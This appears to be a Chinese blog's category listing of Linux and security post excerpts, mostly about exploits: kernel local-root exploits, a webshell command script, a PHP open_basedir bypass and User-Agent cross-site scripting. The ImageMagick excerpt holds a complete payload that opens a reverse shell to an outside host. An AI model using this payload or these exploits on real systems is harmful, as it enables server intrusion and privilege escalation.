随笔分类 -  linux

上一页 1 2
linux系列安全
ImageMagick又一处命令执行
摘要:push graphic-context viewbox 0 0 640 480 image copy 200,200 100,100 "|bash -i >& /dev/tcp/1.1.1.1/1234 0>&1" pop graphic-context 阅读全文
posted @ 2016-06-03 16:29 Hookjoy 阅读(186) 评论(0) 推荐(0)
wget 下载整个网站,或者特定目录
摘要:需要下载某个目录下面的所有文件。命令如下wget -c -r -np -k -L -p www.xxx.org/pub/path/在下载时。有用到外部域名的图片或连接。如果需要同时下载就要用-H参数。wget -np -nH -r --span-hosts www.xxx.org/pub/path/ 阅读全文
posted @ 2016-05-26 17:37 Hookjoy 阅读(407) 评论(0) 推荐(0)
Linux关闭休眠和屏保模式
摘要:本人因为特殊需求,想让某台Linux主机始终显示某个程序,显示器不能关机或者休眠或进入屏保模式。环境:Ubuntu11.10最小化模式安装并安装有轻量级桌面openbox(非gnome)。因为X的屏幕保护,电源管理机制跟gnome不一样。所以无法使用对gnome的一套工具进行设置。所幸发现了名为xs... 阅读全文
posted @ 2015-09-06 06:54 Hookjoy 阅读(16163) 评论(0) 推荐(0)
渗透测试:反弹与转发小结
摘要:http://le4f.net/post/post/reverse-shell-during-the-penetration-test 阅读全文
posted @ 2015-03-31 14:17 Hookjoy 阅读(245) 评论(0) 推荐(0)
User Agent跨站攻击
摘要:看见有人发帖咨询这个问题http://zone.wooyun.org/content/17658我就抛砖引玉下,这个案例就是refer被执行了,我有过多起案例平时上网我们还可以修改浏览器user-agent和访问任意网站都带上你指定的refer长期如此上网你会有意外的收获,我的浏览器user-age... 阅读全文
posted @ 2014-12-31 16:05 Hookjoy 阅读(654) 评论(0) 推荐(0)
Linux kernel perf_swevent_init Local root Exploit
摘要:64位上编译另外修改了原Exploit的一个错误第76行把 uint64_t *p = (void *) ¤t[i];改成 uint64_t *p = (void *) &current[i];** CVE-2013-2094 exploit x86_64 Linux #include #inc... 阅读全文
posted @ 2014-12-11 03:43 Hookjoy 阅读(444) 评论(0) 推荐(0)
FreeBSD Intel SYSRET Kernel Privilege Escalation Exploit
摘要:/* * FreeBSD 9.0 Intel SYSRET Kernel Privilege Escalation exploit * Author by CurcolHekerLink * * This exploit based on open source project, I can ma... 阅读全文
posted @ 2014-12-11 03:30 Hookjoy 阅读(300) 评论(0) 推荐(0)
linux 2.6.37-3.x.x x86_64
摘要:/* * linux 2.6.37-3.x.x x86_64, ~100 LOC * gcc-4.6 -O2 semtex.c && ./a.out * 2010 sd@fucksheep.org, salut! * * update may 2013: * seems like centos 2.... 阅读全文
posted @ 2014-12-11 03:20 Hookjoy 阅读(527) 评论(0) 推荐(0)
当webshell不可执行cmshell时 (菜刀的安全模式!)可用此脚本突破执行cmd命令
摘要:cmd Shell by:anlfi Lock is Switched Off! , The shell can be accessed by anyone! []--------------cmd Shell-----------... 阅读全文
posted @ 2014-12-11 03:11 Hookjoy 阅读(6989) 评论(0) 推荐(1)
php5全版本绕过open_basedir读文件脚本
摘要:这是前段时间写的代码了(http://www.weibo.com/1074745063/ByAPqj7s0),最近一直忙着和几个同学一起做非安全类的创业项目。所以也没拿到JAE、SAE测试一下。 不说了。。进入正题。漏洞很久之前(大概5年前)被提出来了,但并不是php代码上的问题,所以问题一直存在,... 阅读全文
posted @ 2014-12-09 21:41 Hookjoy 阅读(570) 评论(0) 推荐(0)
LINUX 2.6.18-238 local root exp
摘要:/**** 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0* 0 _ __ __ __ ... 阅读全文
posted @ 2014-11-29 20:54 Hookjoy 阅读(1118) 评论(0) 推荐(0)

上一页 1 2